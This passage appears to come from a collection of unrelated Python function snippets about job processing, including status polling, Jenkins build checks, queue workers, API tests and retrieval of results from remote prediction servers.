jobfiles_global['output_putinfo'].update(logfileinfo)\n time.sleep(10)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback,\n limit=4, file=sys.stdout)\n finally:\n keeprunning = False\n else:\n result_lock.acquire()\n\n except:\n keeprunning = False\n print \"Error: thread monitoring encountered an unhandled exception.\"\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback,\n limit=4, file=sys.stdout)\n results.append(1)\n finally:\n if not result_lock.acquire(False):\n result_lock.release()\n lock_monitor.acquire()\n lock_monitor.notify_all()\n lock_monitor.release()\n else:\n result_lock.release()\n\n donejobs += 1", "def check_result(self, params, server):\n if server['building']:\n # I assume Server and client are on the same TimeZone\n # the API doesn't tell me where is the server (only /systemInfo)\n job_started = datetime.fromtimestamp(int(server['timestamp']) / 1000)\n time_delta = (params['now'] - job_started)\n\n # New in version 2.7 --> datetime.timedelta.total_seconds\n # we want python >= 2.4 so we will do it ourselves\n seconds_since_start = time_delta.seconds + time_delta.days * 86400\n job_duration = self.seconds2human(seconds_since_start)\n if (seconds_since_start >= params['critical'] * 60):\n msg = '%s has been running for %s, see %sconsole#footer' % (\n params['job'],\n job_duration,\n server['url'])\n status = 'CRITICAL'\n elif (seconds_since_start >= params['warning'] * 60):\n msg = '%s has been running for %s, see %sconsole#footer' % (\n params['job'],\n job_duration,\n server['url'])\n status = 'WARNING'\n else:\n msg = '%s still running after %s, watch it on %sconsole#footer' % (\n params['job'],\n job_duration,\n server['url'])\n status = 'OK'\n else:\n # Easy part, the job has completed ...\n if server['result'] == 'SUCCESS':\n duration = self.seconds2human(server['duration'] / 1000)\n msg = '%s exited normally after %s' % (params['job'], duration)\n status = 'OK'\n\n elif server['result'] == 'UNSTABLE':\n duration = self.seconds2human(server['duration'] / 1000)\n msg = '%s is marked as unstable after %s, see %sconsole#footer' % (\n params['job'], duration, server['url'])\n status = 'WARNING'\n\n elif server['result'] == 'FAILURE':\n msg = '%s exited with an error, see %sconsole#footer' % (\n params['job'], server['url'])\n status = 'CRITICAL'\n\n elif server['result'] == 'ABORTED':\n msg = '%s has been aborted, see %sconsole#footer' % (\n params['job'], server['url'])\n status = 'UNKNOWN'\n else:\n # If you get there, patch welcome\n msg = '%s is in a not known state, Jenkins API issue ? 
see %s' % (\n params['job'], server['url'])\n status = 'UNKNOWN'\n\n return(status, msg)", "def process(self):\n # return ProcessorResult(True, _('OK'))\n return (True, _(\"OK\"))", "def handle_specific_job(job, manager):\n job_id = job['job_id']\n job_type = job['job_type']\n\n if job_type == 'documents':\n results = find_documents_data(manager, job, job_id)\n\n elif job_type == 'document':\n results = find_document_data(manager, job, job_id)\n\n elif job_type == 'docket':\n results = find_docket_data(manager, job, job_id)\n\n elif job_type == 'download':\n results = find_download_data(manager, job, job_id)\n\n elif job_type == 'none':\n return None\n\n return results", "def _process_upload_job_async(self, job):\n logger.info('Uploading file to Sia: %s', job.local_path)\n try:\n return self._sia_client.upload_file_async(job.local_path,\n job.sia_path)\n except Exception as ex:\n logger.error('Upload failed: %s', ex.message)\n job.increment_failure_count()\n return False", "def _wait_for_results(self) -> RemoteCallableResult:\n if (\n self.subscriber is None or\n self.started is None or\n self.process is None\n ):\n raise dbt.exceptions.InternalException(\n '_wait_for_results() called before handle()'\n )\n\n try:\n msg = self.subscriber.dispatch_until_exit(\n started=self.started,\n timeout=self.timeout,\n )\n except dbt.exceptions.Exception as exc:\n raise dbt_error(exc)\n except Exception as exc:\n raise server_error(exc)\n if isinstance(msg, QueueErrorMessage):\n raise RPCException.from_error(msg.error)\n elif isinstance(msg, QueueTimeoutMessage):\n if not self._single_threaded:\n self.process.terminate()\n raise timeout_error(self.timeout)\n elif isinstance(msg, QueueResultMessage):\n return msg.result\n else:\n raise dbt.exceptions.InternalException(\n 'Invalid message type {} (result={})'.format(msg)\n )", "def run(self,id=None):\n # loop until the process is running or halted.\n while 1:\n\n my_job_status, my_job = self.find_job_and_job_status()\n\n if not my_job_status:\n time.sleep(5)\n continue\n\n if sum(map(lambda st: int(st==my_job_status), self.return_status)) > 0:\n return (my_job_status, my_job.printOld())\n\n time.sleep(5)\n continue", "def test_py_job_result(self):\n test_app = self._create_py_app()\n class_path = \"example_jobs.word_count.WordCountSparkSessionJob\"\n conf = \"input.strings = ['a', 'b', 'a', 'b']\"\n job = self._create_job(test_app, class_path, conf,\n ctx=self._get_functional_py_context())\n time.sleep(3)\n self._wait_till_job_is_done(job)\n job = self.client.jobs.get(job.jobId)\n self.assertEqual(\"FINISHED\", job.status)\n self.assertEqual({\"'a'\": 2, \"'b'\": 2}, job.result)", "async def status(self) -> JobStatus:\n async with self._redis.pipeline(transaction=True) as tr:\n tr.exists(result_key_prefix + self.job_id) # type: ignore[unused-coroutine]\n tr.exists(in_progress_key_prefix + self.job_id) # type: ignore[unused-coroutine]\n tr.zscore(self._queue_name, self.job_id) # type: ignore[unused-coroutine]\n is_complete, is_in_progress, score = await tr.execute()\n\n if is_complete:\n return JobStatus.complete\n elif is_in_progress:\n return JobStatus.in_progress\n elif score:\n return JobStatus.deferred if score > timestamp_ms() else JobStatus.queued\n else:\n return JobStatus.not_found", "def put_job_success(job, message):\n print('Putting job success')\n print(message)\n code_pipeline.put_job_success_result(jobId=job)", "def handle_upld_data(self, job):\n if job.data[\"high_reliability\"]:\n # Upload the file to all servers\n 
self.put_job_in_all_queues(job)\n\n list_job_results = self.get_internal_results_from_all_servers()\n\n if len(list_job_results) == 0:\n # We got no responses back, there are probably no servers active\n self.put_external_result(self.generate_failure_job(\"Unsuccessful, no servers responded\"))\n return\n\n # Check all the servers had success\n for result in list_job_results:\n if result.result[\"outcome\"] != \"success\":\n self.put_external_result(\n self.generate_failure_job(\"Unsuccessful, one of the servers did not have success\"))\n return\n\n # Tell the client we successfully uploaded to all servers\n response_result = copy.deepcopy(list_job_results[0])\n response_result.processed_by = None\n self.put_external_result(response_result)\n\n else:\n\n # Check we recognise the token\n if job.token not in self.UPLD_TOKEN_DICT:\n print(\"UNRECOGNISED TOKEN: {}\".format(job.token))\n return\n\n # Pass the job onto the server associated with the job token\n server_name = self.UPLD_TOKEN_DICT[job.token]\n self.put_job_in_specific_server_queue(job, server_name)\n\n # Get the result from the server and pass it back to the client\n result = self.get_internal_result_from_server(server_name,\n timeout=30\n if job.data[\"file_size\"] > 2 * 2 ** 20 else 4)\n self.put_external_result(result)", "def check_results(request):\n \n # Check if an ID was supplied.\n if ('ID' not in request.GET):\n response = HttpResponse()\n response.status_code = 400 # Bad Request\n response.reason_phrase = (\"No ID was passed. The ID used to start \"\n \"the classification job must be sent to \"\n \"check the progress. The ID should be \"\n \"passed in a parameter named 'ID'.\")\n return response\n \n # Ensure a file exists with the specified ID.\n id = request.GET['ID']\n if (not File.objects.filter(file_name=id).exists()):\n response = HttpResponse()\n response.status_code = 400 # Bad Request\n response.reason_phrase = ('The passed ID was invalid. If the ID you '\n 'sent was returned by a validate request, '\n 'it is possible the ID has expired and the '\n 'job was deleted.')\n \n # Retrieve the job for the requested file.\n file = File.objects.get(file_name=id)\n job = file.job\n \n # If the job is complete, send the results. Otherwise, send all of the\n # updates for the job.\n has_result = JobResult.objects.filter(job=job).exists()\n return job_results(request, job) if has_result else \\\n job_updates(request, job)", "def compute(self):\n try:\n self.set_trackline()\n except:\n app.logger.warning(\"Could not process trackline results. 
URL may be invalid?\")\n\n if Job.exists(self.task_id, connection=redis_connection):\n job = Job.fetch(self.task_id, connection=redis_connection)\n self.task_result = unicode(job.meta.get(\"outcome\", \"\"))\n\n self.save()", "def work(self, job):\n pass", "def test_successful_execution(self):\n\n url = '/%s/jobs/%i/' % (self.api, self.job.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n\n self.assertEqual(result['execution']['job']['id'], self.job.id)\n self.assertEqual(result['execution']['job_type']['id'], self.job_type.id)\n self.assertEqual(result['execution']['exe_num'], self.job_exe.exe_num)", "def test_jobs_successful(self):\n\n workspace = storage_test_utils.create_workspace()\n file1 = storage_test_utils.create_file()\n data_dict = {\n 'version': '1.0',\n 'input_data': [{\n 'name': 'INPUT_IMAGE',\n 'file_id': file1.id\n }],\n 'output_data': [{\n 'name': 'output_file_pngs',\n 'workspace_id': workspace.id\n }]}\n\n secret_configuration = {\n 'version': '6',\n 'priority': 50,\n 'output_workspaces': {'default': storage_test_utils.create_workspace().name},\n 'settings': {\n 'DB_HOST': 'som.host.name',\n 'DB_PASS': 'secret_password'\n }\n }\n\n seed_job_type = job_test_utils.create_seed_job_type(configuration=secret_configuration)\n seed_job = job_test_utils.create_job(job_type=seed_job_type, status='RUNNING', input=data_dict)\n\n url = '/%s/jobs/%d/' % (self.api, seed_job.id)\n response = self.client.generic('GET', url)\n result = json.loads(response.content)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n self.assertEqual(result['configuration']['priority'],50)\n self.assertNotIn('DB_PASS', result['configuration']['settings'])", "def find_job_and_job_status(self):\n\n def find_job_and_job_status_log_history(f):\n rcelog('critical', \"find_job_and_status(): Found job {0} in history. 
Terminated in error.\".\n format(self.id))\n return f\n\n try:\n return self.__get_job_status_from_queue__()\n except:\n pass\n\n try:\n return find_job_and_job_status_log_history(self.__get_job_status_from_history__())\n except:\n return (None, None)", "def test_results_success(self, affiliate_items):\n success_count = 0\n\n updater = mock.Mock()\n batch_job = BatchJob(affiliate_items, updater)\n\n for result in batch_job.run():\n success_count += int(not result.is_error)\n\n assert success_count == 4", "def execute(self, context: Context) -> None:\n self.hook = AirbyteHook(airbyte_conn_id=self.airbyte_conn_id, api_version=self.api_version)\n job_object = self.hook.submit_sync_connection(connection_id=self.connection_id)\n self.job_id = job_object.json()[\"job\"][\"id\"]\n\n self.log.info(\"Job %s was submitted to Airbyte Server\", self.job_id)\n if not self.asynchronous:\n self.log.info(\"Waiting for job %s to complete\", self.job_id)\n self.hook.wait_for_job(job_id=self.job_id, wait_seconds=self.wait_seconds, timeout=self.timeout)\n self.log.info(\"Job %s completed successfully\", self.job_id)\n\n return self.job_id", "def process_job(q):\n del log_msg[:]\n logger.info('Processing Job %s', q.id)\n\n datatype = q.datatype\n input_dir = q.input_dir\n output_dir = q.output_dir\n processor = q.processor\n if datatype.lower() == 'laz':\n block_name = proper_block_name(input_dir)\n elif datatype.lower() == 'ortho':\n block_name = proper_block_name_ortho(input_dir)\n if datatype.lower() == 'laz' or datatype.lower() == 'ortho':\n logger.info('Verifying las tiles in directory...')\n log_msg.append('Verifying las tiles in directory...\\n')\n has_error, remarks = verify_dir(input_dir, datatype.lower())\n\n if has_error:\n assign_status(q, error=True)\n log_msg.append('Error in verify_las/verify_raster!\\n {0} \\n'.format(remarks))\n else:\n logger.info('Renaming tiles...')\n\n logger.info('BLOCK NAME %s', block_name)\n log_msg.append('BLOCK NAME {0}\\n'.format(block_name))\n\n in_coverage, block_uid = find_in_coverage(block_name)\n\n #: Check first if folder or `block_name` is in `Cephgeo_LidarCoverageBlock`\n #: If not found, `output_dir` is not created and data is not processed\n if in_coverage:\n logger.info('Found in Lidar Coverage model %s %s',\n block_name, block_uid)\n log_msg.append('Found in Lidar Coverage model {0} {1}\\n'.format(\n block_name, block_uid))\n\n rename_tiles(input_dir, output_dir, processor,\n block_name, block_uid, q)\n logger.info('Status %s Status Timestamp %s',\n q.status, q.status_timestamp)\n log_msg.append('Status {0} Status Timestamp {1}\\n'.format(\n q.status, q.status_timestamp))\n\n else:\n has_error = True\n logger.error('ERROR NOT FOUND IN MODEL %s %s', block_name, block_uid)\n log_msg.append('ERROR NOT FOUND IN MODEL {0} {1}\\n'.format(block_name, block_uid))\n assign_status(q, error=True)\n # for DEM\n else:\n logger.info('Handler not implemented for type: %s',\n str(q.datatype))\n log_msg.append('Handler not implemented for type: {0}\\n'.format(\n str(q.datatype)))\n assign_status(q, error=True)\n\n paragraph = ''\n for par in log_msg:\n paragraph = paragraph + par\n\n #: Save log messages from renaming tiles to `Automation_AutomationJob.log`\n with PSQL_DB.atomic() as txn:\n new_q = (Automation_AutomationJob\n .update(data_processing_log=paragraph, status_timestamp=datetime.now())\n .where(Automation_AutomationJob.id == q.id))\n new_q.execute()", "def check_result(self, result):\n self.log.info(\"--check_result, result= %s\", result)\n if 
result[0]['exit_status'] != 0:\n self.fail(\"##Error detected from check_result\")\n else:\n self.log.info(\"--check_result passed\")", "def _work_function(job_q, result_q, error_q):\r\n # type: (Queue, Queue, Queue) -> None\r\n while True:\r\n job = job_q.get()\r\n\r\n if isinstance(job, _ThreadPoolSentinel):\r\n # All the work is done, get out\r\n result_q.put(_ThreadPoolSentinel())\r\n error_q.put(_ThreadPoolSentinel())\r\n job_q.task_done()\r\n break\r\n\r\n function = job[0]\r\n args = job[1]\r\n try:\r\n result = function(*args)\r\n except Exception as e:\r\n error_q.put((job, e))\r\n else:\r\n result_q.put((job, result))\r\n finally:\r\n job_q.task_done()", "def test_successful(self):\n\n url = '/%s/job-types/running/' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['job_type']['name'], self.job.job_type.name)\n self.assertEqual(result['results'][0]['count'], 1)\n self.assertIsNotNone(result['results'][0]['longest_running'])", "def put_job(self, job):\n\n # Handle the job, depending on its command\n if job.command == \"UPLD_INIT\":\n self.handle_upld_init(job)\n elif job.command == \"UPLD_DATA\":\n self.handle_upld_data(job)\n elif job.command == \"DWLD\":\n self.handle_dwld(job)\n elif job.command == \"DELF_INIT\":\n self.handle_delf_init(job)\n elif job.command == \"DELF_CONF\":\n self.handle_delf_conf(job)\n elif job.command == \"LIST\":\n self.handle_list(job)\n else:\n print(\"Unrecognised command: {}\".format(job.command))\n return", "def _base_check(self, func, on_true, on_false, *args, otherwise=\"\"):\n\n # Retrieve information about the line number and filename of the check.\n frame = inspect.currentframe().f_back\n lineno = frame.f_lineno\n filepath = frame.f_globals[\"__file__\"]\n filename = os.path.basename(filepath)\n\n # Try and run the check. If we run into an exception, report it.\n try:\n if func(*args):\n result, data = SUCCESS, on_true.format(*args)\n else:\n result, data = FAILURE, on_false.format(*args)\n except Exception as e:\n result, data = ERROR, str(e)\n\n # Display and record our results.\n dots(result)\n self.results.append(\n Result(result=result, data=data, case=self.case, alt=otherwise,\n filename=filename, lineno=lineno)\n )", "def callFromWorker(cls, func, args, on_success=None, on_failure=None, on_complete=None):\n worker = cls(func, args)\n if on_success is not None:\n worker.job_succeeded.connect(on_success)\n if on_failure is not None:\n worker.job_failed.connect(on_failure)\n if on_complete is not None:\n worker.finished.connect(on_complete)\n worker.start()\n\n return worker", "def get_result(self):\n\t\treturn handle_to_object(call_sdk_function('PrlJob_GetResult', self.handle))", "def multiprocessing_job(self, job_function: Callable[['Task.Task'], 'Task.Task']=None) -> None:\n\n if job_function is None:\n raise ValueError(\"Job Function object not provided.\")\n while True:\n try:\n task = self.input_queue.get(timeout=1)\n if task:\n '''\n Based on how this should work, job_function must take\n in a Submission object as its sole parameter, and\n return a Submission object. 
To avoid major overhauls,\n it's best to keep the '*_job' functions mostly the same,\n but changing the function parametes and what it returns.\n '''\n if self.logger.getEffectiveLevel() == logging.DEBUG:\n self.logger.debug(f\"\\nTask Received: {task._to_string()}\\n\")\n else:\n self.logger.info(f\"\\nTask Received: {task.get_job_id()} containing file {task.get_file_name()}\\n\")\n try:\n # Push the name of the manager and its current jobs.\n if self.slack_queue:\n slack_information = [self.name, task.fetch_info('user_initials'), task.get_file_name(), \"Pending\", 1]\n self.push_information_to_slack_bot(self.slack_queue, slack_information)\n # Perform the job function on the task\n task = job_function(task)\n # Upon success, push information to the Slack Bot (if enabled)\n if self.slack_queue:\n slack_information = [self.name, task.fetch_info('user_initials'), task.get_file_name(), \"Complete\", 2]\n self.push_information_to_slack_bot(self.slack_queue, slack_information)\n # Log the task completion\n self.logger.info(f\"\\nTask Completed: {task.get_job_id()} containing file {task.get_file_name()}\\n\")\n # Place the task in the output queue\n self.output_queue.put(task)\n # Mark the task as finished via task_done\n self.input_queue.task_done()\n # Take a short breather and let the CPU focus on other stuff.\n sleep(1)\n except KeyboardInterrupt as k:\n if self.logger.getEffectiveLevel() == logging.DEBUG:\n self.logger.exception(msg=f\"Task {task.job_id} encountered an exception in job {job_function.__name__} due to SIGINT event.\\n\")\n else:\n self.logger.error(msg=f\"\\nTask {task.job_id} encountered an exception in job {job_function.__name__}\\nError Message: {k}\\n\")\n # If any errors that can be caught occur\n except BaseException as e:\n # Log the event with varying degrees of information\n if self.logger.getEffectiveLevel() == logging.DEBUG:\n self.logger.exception(msg=f\"Task {task.job_id} encountered an exception in job {job_function.__name__}\\nTask Information:\\n{task._to_string()}\")\n else:\n self.logger.error(msg=f\"\\nTask {task.job_id} encountered an exception in job {job_function.__name__}\\nError Message: {e}\\n\")\n # Inform the submitter via Slack Notification (not Slack Bot)\n # If the Slack Bot is enabled pass the error information to it\n if self.slack_queue:\n slack_information = [self.name, task.fetch_info('user_initials'), task.get_file_name(), \"Error\", 2]\n self.push_information_to_slack_bot(self.slack_queue, slack_information)\n # Place the task in the error queue\n self.error_queue.put(task)\n # Mark the task as finished via task_done\n self.input_queue.task_done()\n else:\n #Media was None signal (this kills the Process)\n self.input_queue.task_done()\n break\n except ValueError:\n break\n # If the worker does not receive anything it will throw this exception, which will kill the process.\n except queue.Empty:\n self.logger.debug(f\"\\nA process has enountered the Queue.Empty exception indicating there are no more things to process.\")\n break", "def reprocess(self):\n self._log.debug(\"About to reprocess job {0}\".format(self.id))\n resp = self._api.reprocess(self.id)\n\n if resp.success:\n return True\n\n if resp.result.type is None:\n # Call was successful but job was unable to be reprocessed.\n return False\n\n else:\n raise resp.result", "def wait_for_job(self, value):\n logger.info('Waiting for job %s' % self.job_name)\n\n if self.provider_options.dry_run == True:\n logger.info('Dry run: continuing')\n else:\n logger.info('Checking job status...')\n 
provider = provider_base.get_provider(self.provider_options)\n\n while True:\n tasks = provider.lookup_job_tasks('*', job_name_list=[self.job_name], max_jobs=1)\n logger.debug('Tasks: %s' % tasks)\n\n if not tasks:\n raise RuntimeError('Job not found: %s' % self.job_name)\n\n is_running = False\n status = None\n\n # Wait until all tasks succeed; abort if any task fails or is canceled\n for task in tasks:\n status = provider.get_task_field(task, 'job-status')\n\n if status == 'RUNNING':\n is_running = True\n elif status == 'CANCELED':\n raise RuntimeException('Job %s: CANCELED' % self.job_name)\n elif status == 'FAILURE':\n error = provider.get_task_field(task, 'error-message')\n raise RuntimeException('Job %s: FAILURE. Error message: %s' % (self.job_name, error))\n\n if is_running:\n time.sleep(self.poll_interval)\n else:\n break\n\n logger.info('Job %s: SUCCESS' % self.job_name)\n return 'Success'", "def GetResult(jobid, g_params): # {{{\n # retrieving result from the remote server for this job\n gen_logfile = g_params['gen_logfile']\n gen_errfile = g_params['gen_errfile']\n\n webcom.loginfo(f\"GetResult for {jobid}.\\n\", gen_logfile)\n\n path_static = g_params['path_static']\n path_result = os.path.join(path_static, 'result')\n path_cache = g_params['path_cache']\n finished_date_db = g_params['finished_date_db']\n name_server = g_params['name_server']\n\n rstdir = os.path.join(path_result, jobid)\n runjob_logfile = os.path.join(rstdir, \"runjob.log\")\n runjob_errfile = os.path.join(rstdir, \"runjob.err\")\n outpath_result = os.path.join(rstdir, jobid)\n if not os.path.exists(outpath_result):\n os.mkdir(outpath_result)\n\n remotequeue_idx_file = os.path.join(rstdir, \"remotequeue_seqindex.txt\")\n\n torun_idx_file = os.path.join(rstdir, \"torun_seqindex.txt\")\n finished_idx_file = os.path.join(rstdir, \"finished_seqindex.txt\")\n query_parafile = os.path.join(rstdir, \"query.para.txt\")\n\n query_para = {}\n if os.path.exists(query_parafile):\n content = myfunc.ReadFile(query_parafile)\n if content != \"\":\n try:\n query_para = json.loads(content)\n except ValueError:\n query_para = {}\n failed_idx_file = os.path.join(rstdir, \"failed_seqindex.txt\")\n\n starttagfile = os.path.join(rstdir, \"runjob.start\")\n cnttry_idx_file = os.path.join(rstdir, \"cntsubmittry_seqindex.txt\") # index file to keep log of tries\n tmpdir = os.path.join(rstdir, \"tmpdir\")\n finished_seq_file = os.path.join(outpath_result, \"finished_seqs.txt\")\n\n if not os.path.exists(tmpdir):\n os.mkdir(tmpdir)\n\n finished_info_list = [] # [info for finished record]\n finished_idx_list = [] # [origIndex]\n failed_idx_list = [] # [origIndex]\n resubmit_idx_list = [] # [origIndex]\n keep_queueline_list = [] # [line] still in queue\n\n cntTryDict = {}\n if os.path.exists(cnttry_idx_file):\n with open(cnttry_idx_file, 'r') as fpin:\n try:\n cntTryDict = json.load(fpin)\n except Exception:\n cntTryDict = {}\n\n # in case of missing queries, if remotequeue_idx_file is empty but the job\n # is still not finished, force recreating torun_idx_file\n if 'DEBUG' in g_params and g_params['DEBUG']:\n try:\n webcom.loginfo(\"DEBUG: %s: remotequeue_idx_file=%s, size(remotequeue_idx_file)=%d, content=\\\"%s\\\"\\n\" %(jobid, remotequeue_idx_file, os.path.getsize(remotequeue_idx_file), myfunc.ReadFile(remotequeue_idx_file)), gen_logfile)\n except Exception:\n pass\n if ((not os.path.exists(remotequeue_idx_file) or # {{{\n os.path.getsize(remotequeue_idx_file) < 1)):\n idlist1 = []\n idlist2 = []\n if 
os.path.exists(finished_idx_file):\n idlist1 = myfunc.ReadIDList(finished_idx_file)\n if os.path.exists(failed_idx_file):\n idlist2 = myfunc.ReadIDList(failed_idx_file)\n\n completed_idx_set = set(idlist1 + idlist2)\n\n jobinfofile = os.path.join(rstdir, \"jobinfo\")\n jobinfo = myfunc.ReadFile(jobinfofile).strip()\n jobinfolist = jobinfo.split(\"\\t\")\n if len(jobinfolist) >= 8:\n numseq = int(jobinfolist[3])\n\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: len(completed_idx_set)=%d+%d=%d, numseq=%d\\n\"%(len(idlist1), len(idlist2), len(completed_idx_set), numseq), gen_logfile)\n\n if len(completed_idx_set) < numseq:\n all_idx_list = [str(x) for x in range(numseq)]\n torun_idx_str_list = list(set(all_idx_list)-completed_idx_set)\n for idx in torun_idx_str_list:\n try:\n cntTryDict[int(idx)] += 1\n except (ValueError, IndexError, KeyError):\n cntTryDict[int(idx)] = 1\n myfunc.WriteFile(\"\\n\".join(torun_idx_str_list)+\"\\n\", torun_idx_file, \"w\", True)\n\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"recreate torun_idx_file: jobid = %s, numseq=%d, len(completed_idx_set)=%d, len(torun_idx_str_list)=%d\\n\"%(jobid, numseq, len(completed_idx_set), len(torun_idx_str_list)), gen_logfile)\n else:\n myfunc.WriteFile(\"\", torun_idx_file, \"w\", True)\n else:\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: %s: remotequeue_idx_file %s is not empty\\n\" %(jobid, remotequeue_idx_file), gen_logfile)\n# }}}\n\n text = \"\"\n if os.path.exists(remotequeue_idx_file):\n text = myfunc.ReadFile(remotequeue_idx_file)\n if text == \"\":\n return 1\n lines = text.split(\"\\n\")\n\n nodeSet = set([])\n for i in range(len(lines)):\n line = lines[i]\n if not line or line[0] == \"#\":\n continue\n strs = line.split(\"\\t\")\n if len(strs) != 6:\n continue\n node = strs[1]\n nodeSet.add(node)\n\n myclientDict = {}\n for node in nodeSet:\n wsdl_url = f\"http://{node}/pred/api_submitseq/?wsdl\"\n try:\n myclient = Client(wsdl_url, cache=None, timeout=30)\n myclientDict[node] = myclient\n except Exception as e:\n webcom.loginfo(f\"Failed to access {wsdl_url} with errmsg {e}\", gen_logfile)\n pass\n\n for i in range(len(lines)): # {{{\n line = lines[i]\n\n if 'DEBUG' in g_params and g_params['DEBUG']:\n myfunc.WriteFile(f\"Process {line}\\n\", gen_logfile, \"a\", True)\n if not line or line[0] == \"#\":\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: line empty or line[0] = '#', ignore\", gen_logfile)\n continue\n strs = line.split(\"\\t\")\n if len(strs) != 6:\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: len(strs)=%d (!=6), ignore\\n\"%(len(strs)), gen_logfile)\n continue\n origIndex = int(strs[0])\n node = strs[1]\n remote_jobid = strs[2]\n description = strs[3]\n seq = strs[4]\n submit_time_epoch = float(strs[5])\n subfoldername_this_seq = f\"seq_{origIndex}\"\n outpath_this_seq = os.path.join(outpath_result, subfoldername_this_seq)\n\n try:\n myclient = myclientDict[node]\n except KeyError:\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: node (%s) not found in myclientDict, ignore\"%(node), gen_logfile)\n keep_queueline_list.append(line)\n continue\n try:\n rtValue = myclient.service.checkjob(remote_jobid)\n except Exception as e:\n msg = \"checkjob(%s) at node %s failed with errmsg %s\"%(remote_jobid, node, str(e))\n webcom.loginfo(msg, gen_logfile)\n rtValue = []\n pass\n isSuccess = False\n isFinish_remote = False\n status = \"\"\n if len(rtValue) >= 1:\n 
ss2 = rtValue[0]\n if len(ss2) >= 3:\n status = ss2[0]\n result_url = ss2[1]\n errinfo = ss2[2]\n\n if errinfo and errinfo.find(\"does not exist\") != -1:\n if 'DEBUG' in g_params and g_params['DEBUG']:\n msg = \"Failed for remote_jobid %s with errmsg %s\"%(remote_jobid, str(errinfo))\n webcom.loginfo(msg, gen_logfile)\n\n isFinish_remote = True\n\n if status == \"Finished\": # {{{\n isFinish_remote = True\n outfile_zip = f\"{tmpdir}/{remote_jobid}.zip\"\n isRetrieveSuccess = False\n myfunc.WriteFile(\"\\tFetching result for %s/seq_%d from %s \" % (\n jobid, origIndex, result_url), gen_logfile, \"a\", True)\n if myfunc.IsURLExist(result_url, timeout=5):\n try:\n myfunc.urlretrieve(result_url, outfile_zip, timeout=10)\n isRetrieveSuccess = True\n myfunc.WriteFile(f\" succeeded on node {node}\\n\", gen_logfile, \"a\", True)\n except Exception as e:\n myfunc.WriteFile(\" failed with %s\\n\"%(str(e)), gen_logfile, \"a\", True)\n pass\n if os.path.exists(outfile_zip) and isRetrieveSuccess:\n cmd = [\"unzip\", outfile_zip, \"-d\", tmpdir]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n rst_fetched = os.path.join(tmpdir, remote_jobid)\n if name_server.lower() == \"pconsc3\":\n rst_this_seq = rst_fetched\n elif name_server.lower() == \"boctopus2\":\n rst_this_seq = os.path.join(rst_fetched, \"seq_0\", \"seq_0\")\n rst_this_seq_parent = os.path.join(rst_fetched, \"seq_0\")\n else:\n rst_this_seq = os.path.join(rst_fetched, \"seq_0\")\n\n if os.path.islink(outpath_this_seq):\n os.unlink(outpath_this_seq)\n elif os.path.exists(outpath_this_seq):\n shutil.rmtree(outpath_this_seq)\n\n if os.path.exists(rst_this_seq) and not os.path.exists(outpath_this_seq):\n cmd = [\"mv\", \"-f\", rst_this_seq, outpath_this_seq]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n if name_server.lower() == \"boctopus2\":\n # move also seq.fa and time.txt for boctopus2\n file1 = os.path.join(rst_this_seq_parent, \"seq.fa\")\n file2 = os.path.join(rst_this_seq_parent, \"time.txt\")\n for f in [file1, file2]:\n if os.path.exists(f):\n try:\n shutil.move(f, outpath_this_seq)\n except:\n pass\n\n fafile_this_seq = os.path.join(outpath_this_seq, \"seq.fa\")\n if webcom.IsCheckPredictionPassed(outpath_this_seq, name_server):\n # relpace the seq.fa with original description\n myfunc.WriteFile('>%s\\n%s\\n'%(description, seq), fafile_this_seq, 'w', True)\n isSuccess = True\n\n if isSuccess:\n # delete the data on the remote server\n try:\n rtValue2 = myclient.service.deletejob(remote_jobid)\n except Exception as e:\n msg = \"Failed to deletejob(%s) on node %s with errmsg %s\"%(remote_jobid, node, str(e))\n webcom.loginfo(msg, gen_logfile)\n rtValue2 = []\n pass\n\n logmsg = \"\"\n if len(rtValue2) >= 1:\n ss2 = rtValue2[0]\n if len(ss2) >= 2:\n status = ss2[0]\n errmsg = ss2[1]\n if status == \"Succeeded\":\n logmsg = \"Successfully deleted data on %s \"\\\n \"for %s\"%(node, remote_jobid)\n else:\n logmsg = \"Failed to delete data on %s for \"\\\n \"%s\\nError message:\\n%s\\n\"%(node, remote_jobid, errmsg)\n else:\n logmsg = \"Failed to call deletejob %s via WSDL on %s\\n\"%(remote_jobid, node)\n\n # delete the downloaded temporary zip file and\n # extracted file\n if os.path.exists(outfile_zip):\n os.remove(outfile_zip)\n if os.path.exists(rst_fetched):\n shutil.rmtree(rst_fetched)\n\n # create or update the md5 cache\n if name_server.lower() == \"prodres\" and query_para != {}:\n md5_key = hashlib.md5((seq+str(query_para)).encode('utf-8')).hexdigest()\n else:\n md5_key = hashlib.md5(seq.encode('utf-8')).hexdigest()\n 
